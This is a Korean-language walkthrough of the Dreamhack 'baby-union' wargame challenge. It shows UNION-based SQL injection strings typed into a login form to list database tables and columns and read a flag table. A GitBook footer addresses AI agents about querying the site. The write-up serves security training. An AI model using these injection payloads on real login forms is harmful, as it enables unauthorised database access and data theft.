> For the complete documentation index, see [llms.txt](https://docs.cooku222.kr/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.cooku222.kr/security/web-hacking/dreamhack/dreamhack-baby-union-writeup.md).

# \[Dreamhack] Baby-union Writeup

#### 문제 링크

<https://dreamhack.io/wargame/challenges/984>

[baby-unionDescription 로그인 시 계정의 정보가 출력되는 웹 서비스입니다. SQL INJECTION 취약점을 통해 플래그를 획득하세요. 문제에서 주어진 init.sql 파일의 테이블명과 컬럼명은 실제 이름과 다릅니다. 플래dreamhack.io](https://dreamhack.io/wargame/challenges/984)

#### 문제

<figure><img src="https://blog.kakaocdn.net/dna/bQgJLj/btsEtu8OXLX/AAAAAAAAAAAAAAAAAAAAAOy1QPOlofJ3X0l5fuI34n5_HufCCcMMC6f2rQBbGa1x/img.jpg?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=WvMCaZnol2O0JbVH37RHzYKijDQ%3D" alt="" height="347" width="1012"><figcaption></figcaption></figure>

#### 풀이

```
'
```

uid부분에는 위의 값을 대입해주고

```
union select table_name, null, null, null from information_schema.tables#
```

upw부분에는 위의 값을 대입해준다. 칼럼 수가 4개임을 이용하는 것이다.&#x20;

<figure><img src="https://blog.kakaocdn.net/dna/zgumi/btsEqugXd5T/AAAAAAAAAAAAAAAAAAAAAKJhxEyA7Xh7bXDWE8Wnkv6XncGcR_eiGs_TnBc8k4Tv/img.jpg?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=JIt54i9q2e9ATm0LhOzAbSJ7bZk%3D" alt="" height="422" width="1250"><figcaption></figcaption></figure>

<figure><img src="https://blog.kakaocdn.net/dna/b7ffhE/btsEuN77GN4/AAAAAAAAAAAAAAAAAAAAAEMMkjoB0eLA0KuDGYPegCSCY6XC3NvU-CFXiJa4gsgK/img.jpg?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=bYyYJa%2FUFFhFPw3CmIgvGMXXSbk%3D" alt="" height="460" width="1168"><figcaption></figcaption></figure>

프롬프트에 입력하면 위와 같이 창이 뜬다. onlyflag가 flag값과 연관이 있어보이므로 다시 로그인 페이지로 가서

```
'
```

uid에는 위와 같이 입력,

```
union select column_name, null, null, null from
information_schema.columns where table_name='onlyflag' #
```

upw에는 다음과 같이 입력한다.

<figure><img src="https://blog.kakaocdn.net/dna/TKyai/btsEpptAYvs/AAAAAAAAAAAAAAAAAAAAANhDSN372lQSDqw8pK14_1PmJCajgletl6ncMIJ7N4kE/img.jpg?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=KQam%2BuTiKeoVYu9a3eyBJclVpRc%3D" alt="" height="445" width="1227"><figcaption></figcaption></figure>

onlyflag에 들어있는 칼럼들을 알 수 있는데, 이때 이 sname, svalue, sflag, sclose를 누락하지 않고 다음 번에 로그인 페이지에 입력을 해주게 되면 다음과 같이 페이크 플래그가 출력되는 것을 알 수 있다.&#x20;

<figure><img src="https://blog.kakaocdn.net/dna/6HWBf/btsEoJ6tlO6/AAAAAAAAAAAAAAAAAAAAAPjl2LAt2VbZvfKJrDDfi3TLLefX4K1l9QIi1XCCClJW/img.jpg?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=cnLq042asmbMmqZUUZtret%2FBsg0%3D" alt="" height="321" width="907"><figcaption></figcaption></figure>

따라서 다시 입력하면

```
'
```

uid에는 이렇게,

```
union select svalue, sflag, null, sclose from onlyflag #
```

upw에는 이렇게 입력을 해준다. (이렇게 된 이유는, 원본 파일의 코드를 보면 우리가 볼 수 있는 칼럼 수가 3개로 제한되어 있기 때문에 하나의 칼럼을 널 값으로 바꾸는 것이다.)

<figure><img src="https://blog.kakaocdn.net/dna/blhhL4/btsEppUF4JZ/AAAAAAAAAAAAAAAAAAAAAJaNYCGYQwt0EetFECPLO7HgYA-dLeIphS32UNh_zf1T/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=XdlEeyESi0fM3JlHz0sCmJXZ7PA%3D" alt="" height="340" width="1092"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.cooku222.kr/security/web-hacking/dreamhack/dreamhack-baby-union-writeup.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.